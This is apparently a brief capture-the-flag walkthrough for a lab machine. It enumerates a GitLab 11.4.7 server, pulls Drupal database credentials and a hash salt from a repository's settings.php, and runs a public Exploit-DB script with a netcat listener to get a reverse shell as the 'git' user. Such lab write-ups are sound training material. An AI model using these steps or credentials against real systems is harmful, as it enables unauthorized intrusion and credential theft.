3 :5080 gitlab

Login page at: http://10.10.10.220:5080/users/sign_in

Created new account and got logged in >

There is one repo: http://10.10.10.220:5080/dude/ready-channel

Look like Drupal file-system structure Looking into ready-channel/sites/default/settings.php

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => '%%cHzhNC=k9yYN!T',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
$drupal_hash_salt = 'txgQ6RR8KK4Q4oJRoBp-ihbXALf2tbBFLFyp9suxQxc';

http://10.10.10.220:5080/help shows GitLab Community Edition 11.4.7

Using https://www.exploit-db.com/exploits/49334

$ python3 ex.py -u kashz@local.host -p qwerty@123 -g http://10.10.10.220 -l 10.10.14.2 -P 6969      
[+] authenticity_token: vVE0Fdvrgd2nkzoSEcNg9T53ex0K1MboH+ViOM4cwNLarNRce5hCfyb/G9xjm0bZSJx/QloFm51Oy8v+84FOOw==
[+] Creating project with random name: project3807
[+] Running Exploit
[+] Exploit completed successfully!

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.220] 38462
whoami
git

Last updated